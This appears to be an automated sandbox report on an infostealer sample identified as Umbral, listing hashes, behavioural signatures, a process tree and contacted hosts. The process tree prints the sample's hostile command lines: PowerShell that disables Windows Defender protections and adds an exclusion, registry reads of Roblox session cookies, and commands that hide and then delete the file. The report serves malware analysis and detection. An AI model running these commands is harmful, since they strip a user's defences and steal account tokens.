Analysis

max time kernel: 147s
max time network: 151s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 12-05-2024 19:07
General

Target: STEALERRR3000PRO.exe
Size: 231KB
MD5: 5a006cd74e0225a15746bee6928d62f1
SHA1: a17dabdb634d9667c3590436998252148a5fab92
SHA256: 0350fdb32852f781665e056a04f318e94c746612f7b4e3cd430d808c894aae4c
SHA512: 59d6b467cf48cf1aafaf13e1acfdd6ae4806403f0bc92e759590b04da4ecd719488300ecd412d92931e7b65daf0ab2229d7a165b31595334676b40942bb30f81
SSDEEP: 6144:xloZM9rIkd8g+EtXHkv/iD4gQYPDJ6idFIJbGmTTNb8e1mvmoii:DoZOL+EP8gQYPDJ6idFIJbGmTxro3
Malware Config

Signatures

Detect Umbral payload - 1 IoCs
  resource: behavioral1/memory/1748-1-0x000001E1CF5F0000-0x000001E1CF630000-memory.dmp
  yara_rule: family_umbral

Command and Scripting Interpreter: PowerShell - 1 TTPs, 1 IoCs
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid 3132, process powershell.exe

Drops file in Drivers directory - 1 IoCs
  description: File opened for modification
  ioc: C:\Windows\System32\drivers\etc\hosts
  process: STEALERRR3000PRO.exe

Reads user/profile data of web browsers - 2 TTPs
  Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 - 1 TTPs, 2 IoCs
  flow 1, ioc discord.com
  flow 4, ioc discord.com

Looks up external IP address via web service - 1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 1, ioc ip-api.com

Detects videocard installed - 1 TTPs, 1 IoCs
  Uses WMIC.exe to determine videocard installed.
  pid 3960, process wmic.exe

Runs ping.exe - 1 TTPs, 1 IoCs
  pid 2424, process PING.EXE

Suspicious behavior: EnumeratesProcesses - 10 IoCs
  pid 3132, process powershell.exe
  pid 3132, process powershell.exe
  pid 2712, process powershell.exe
  pid 2712, process powershell.exe
  pid 4716, process powershell.exe
  pid 4716, process powershell.exe
  pid 2936, process powershell.exe
  pid 2936, process powershell.exe
  pid 3156, process powershell.exe
  pid 3156, process powershell.exe

Suspicious use of AdjustPrivilegeToken - 64 IoCs
  Token: SeDebugPrivilege - pid 1748, process STEALERRR3000PRO.exe
  Token: SeDebugPrivilege - pid 3132, process powershell.exe
  Token: SeDebugPrivilege - pid 2712, process powershell.exe
  Token: SeDebugPrivilege - pid 4716, process powershell.exe
  Token: SeDebugPrivilege - pid 2936, process powershell.exe
  Token: SeIncreaseQuotaPrivilege - pid 3884, process wmic.exe
  Token: SeSecurityPrivilege - pid 3884, process wmic.exe
  Token: SeTakeOwnershipPrivilege - pid 3884, process wmic.exe
  Token: SeLoadDriverPrivilege - pid 3884, process wmic.exe
  Token: SeSystemProfilePrivilege - pid 3884, process wmic.exe
  Token: SeSystemtimePrivilege - pid 3884, process wmic.exe
  Token: SeProfSingleProcessPrivilege - pid 3884, process wmic.exe
  Token: SeIncBasePriorityPrivilege - pid 3884, process wmic.exe
  Token: SeCreatePagefilePrivilege - pid 3884, process wmic.exe
  Token: SeBackupPrivilege - pid 3884, process wmic.exe
  Token: SeRestorePrivilege - pid 3884, process wmic.exe
  Token: SeShutdownPrivilege - pid 3884, process wmic.exe
  Token: SeDebugPrivilege - pid 3884, process wmic.exe
  Token: SeSystemEnvironmentPrivilege - pid 3884, process wmic.exe
  Token: SeRemoteShutdownPrivilege - pid 3884, process wmic.exe
  Token: SeUndockPrivilege - pid 3884, process wmic.exe
  Token: SeManageVolumePrivilege - pid 3884, process wmic.exe
  Token: 33 - pid 3884, process wmic.exe
  Token: 34 - pid 3884, process wmic.exe
  Token: 35 - pid 3884, process wmic.exe
  Token: 36 - pid 3884, process wmic.exe
  Token: SeIncreaseQuotaPrivilege - pid 3884, process wmic.exe
  Token: SeSecurityPrivilege - pid 3884, process wmic.exe
  Token: SeTakeOwnershipPrivilege - pid 3884, process wmic.exe
  Token: SeLoadDriverPrivilege - pid 3884, process wmic.exe
  Token: SeSystemProfilePrivilege - pid 3884, process wmic.exe
  Token: SeSystemtimePrivilege - pid 3884, process wmic.exe
  Token: SeProfSingleProcessPrivilege - pid 3884, process wmic.exe
  Token: SeIncBasePriorityPrivilege - pid 3884, process wmic.exe
  Token: SeCreatePagefilePrivilege - pid 3884, process wmic.exe
  Token: SeBackupPrivilege - pid 3884, process wmic.exe
  Token: SeRestorePrivilege - pid 3884, process wmic.exe
  Token: SeShutdownPrivilege - pid 3884, process wmic.exe
  Token: SeDebugPrivilege - pid 3884, process wmic.exe
  Token: SeSystemEnvironmentPrivilege - pid 3884, process wmic.exe
  Token: SeRemoteShutdownPrivilege - pid 3884, process wmic.exe
  Token: SeUndockPrivilege - pid 3884, process wmic.exe
  Token: SeManageVolumePrivilege - pid 3884, process wmic.exe
  Token: 33 - pid 3884, process wmic.exe
  Token: 34 - pid 3884, process wmic.exe
  Token: 35 - pid 3884, process wmic.exe
  Token: 36 - pid 3884, process wmic.exe
  Token: SeIncreaseQuotaPrivilege - pid 3220, process wmic.exe
  Token: SeSecurityPrivilege - pid 3220, process wmic.exe
  Token: SeTakeOwnershipPrivilege - pid 3220, process wmic.exe
  Token: SeLoadDriverPrivilege - pid 3220, process wmic.exe
  Token: SeSystemProfilePrivilege - pid 3220, process wmic.exe
  Token: SeSystemtimePrivilege - pid 3220, process wmic.exe
  Token: SeProfSingleProcessPrivilege - pid 3220, process wmic.exe
  Token: SeIncBasePriorityPrivilege - pid 3220, process wmic.exe
  Token: SeCreatePagefilePrivilege - pid 3220, process wmic.exe
  Token: SeBackupPrivilege - pid 3220, process wmic.exe
  Token: SeRestorePrivilege - pid 3220, process wmic.exe
  Token: SeShutdownPrivilege - pid 3220, process wmic.exe
  Token: SeDebugPrivilege - pid 3220, process wmic.exe
  Token: SeSystemEnvironmentPrivilege - pid 3220, process wmic.exe
  Token: SeRemoteShutdownPrivilege - pid 3220, process wmic.exe
  Token: SeUndockPrivilege - pid 3220, process wmic.exe
  Token: SeManageVolumePrivilege - pid 3220, process wmic.exe

Suspicious use of WriteProcessMemory - 24 IoCs
  PID 1748 wrote to memory of 5076 - pid 1748, process STEALERRR3000PRO.exe, procid_target 80
  PID 1748 wrote to memory of 5076 - pid 1748, process STEALERRR3000PRO.exe, procid_target 80
  PID 1748 wrote to memory of 3132 - pid 1748, process STEALERRR3000PRO.exe, procid_target 82
  PID 1748 wrote to memory of 3132 - pid 1748, process STEALERRR3000PRO.exe, procid_target 82
  PID 1748 wrote to memory of 2712 - pid 1748, process STEALERRR3000PRO.exe, procid_target 84
  PID 1748 wrote to memory of 2712 - pid 1748, process STEALERRR3000PRO.exe, procid_target 84
  PID 1748 wrote to memory of 4716 - pid 1748, process STEALERRR3000PRO.exe, procid_target 86
  PID 1748 wrote to memory of 4716 - pid 1748, process STEALERRR3000PRO.exe, procid_target 86
  PID 1748 wrote to memory of 2936 - pid 1748, process STEALERRR3000PRO.exe, procid_target 88
  PID 1748 wrote to memory of 2936 - pid 1748, process STEALERRR3000PRO.exe, procid_target 88
  PID 1748 wrote to memory of 3884 - pid 1748, process STEALERRR3000PRO.exe, procid_target 90
  PID 1748 wrote to memory of 3884 - pid 1748, process STEALERRR3000PRO.exe, procid_target 90
  PID 1748 wrote to memory of 3220 - pid 1748, process STEALERRR3000PRO.exe, procid_target 93
  PID 1748 wrote to memory of 3220 - pid 1748, process STEALERRR3000PRO.exe, procid_target 93
  PID 1748 wrote to memory of 688 - pid 1748, process STEALERRR3000PRO.exe, procid_target 96
  PID 1748 wrote to memory of 688 - pid 1748, process STEALERRR3000PRO.exe, procid_target 96
  PID 1748 wrote to memory of 3156 - pid 1748, process STEALERRR3000PRO.exe, procid_target 98
  PID 1748 wrote to memory of 3156 - pid 1748, process STEALERRR3000PRO.exe, procid_target 98
  PID 1748 wrote to memory of 3960 - pid 1748, process STEALERRR3000PRO.exe, procid_target 100
  PID 1748 wrote to memory of 3960 - pid 1748, process STEALERRR3000PRO.exe, procid_target 100
  PID 1748 wrote to memory of 2748 - pid 1748, process STEALERRR3000PRO.exe, procid_target 102
  PID 1748 wrote to memory of 2748 - pid 1748, process STEALERRR3000PRO.exe, procid_target 102
  PID 2748 wrote to memory of 2424 - pid 2748, process cmd.exe, procid_target 104
  PID 2748 wrote to memory of 2424 - pid 2748, process cmd.exe, procid_target 104

Views/modifies file attributes - 1 TTPs, 1 IoCs
  pid 5076, process attrib.exe
Processes

Level 1: C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe"
  PID: 1748
  - Drops file in Drivers directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\SYSTEM32\attrib.exe
    Command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe"
    PID: 5076
    - Views/modifies file attributes

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe'
    PID: 3132
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    PID: 2712
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    PID: 4716
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    PID: 2936
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  Level 2: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" os get Caption
    PID: 3884
    - Suspicious use of AdjustPrivilegeToken

  Level 2: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" computersystem get totalphysicalmemory
    PID: 3220
    - Suspicious use of AdjustPrivilegeToken

  Level 2: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" csproduct get uuid
    PID: 688

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    PID: 3156
    - Suspicious behavior: EnumeratesProcesses

  Level 2: C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic" path win32_VideoController get name
    PID: 3960
    - Detects videocard installed

  Level 2: C:\Windows\SYSTEM32\cmd.exe
    Command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\STEALERRR3000PRO.exe" && pause
    PID: 2748
    - Suspicious use of WriteProcessMemory

    Level 3: C:\Windows\system32\PING.EXE
      Command line: ping localhost
      PID: 2424
      - Runs ping.exe
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 2KB
MD5: 627073ee3ca9676911bee35548eff2b8
SHA1: 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Filesize: 944B
MD5: 2e8eb51096d6f6781456fef7df731d97
SHA1: ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256: 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512: 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Filesize: 948B
MD5: 441a842138038e6385e430a90d7ea608
SHA1: 7b3712d2cdd37e10ee9b3994131ee5175e920f01
SHA256: 47592f3324179912d3bdba336b9e75568c2c5f1a9fb37c1ba9f0db9df822164c
SHA512: 9dbddc3216f2a132ae3961b3aeac2c5b8828dcc9292f6c5bf1171c47453aa8687f92658818d771413492c0ea565e9ede17b9c03e427af9dc2ac21a78369a6666

Filesize: 1KB
MD5: f29ff8b1e0f396a194a6782749830b8e
SHA1: 2f8999b0eb2a20e591cf9a638c9fa84ddf4a1f69
SHA256: 5bfd4968395fefaac3941c08fa11e86dfde1072137d9290aee3888f2a5d92d3f
SHA512: 0689d665f2a7c9007c5dc4c14a53d5566d315d05d476bee82d64d02d40e3ffddca2b36419c76a8f7b7979958a62a7a93c939d1ed72fa7a844841ed06741b9e19

Filesize: 1KB
MD5: e8ad350bb24c7ab38efd0ef0553239c7
SHA1: 887c19e4c11de19854458e26a1ed05b67a75bf29
SHA256: 5cf85b38cbbf1a064a4f8001a0ec031993d44e46b8e65d713785c84916cb8ffd
SHA512: 74fef147e98b8b576712c212174a7793deb619d54c7ac7956e38ed4e09202f0c93ae4ec9e89cd4d0ac79c481d30c5c3fc5a3d042537c74d7bffda1f8453aef6e

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82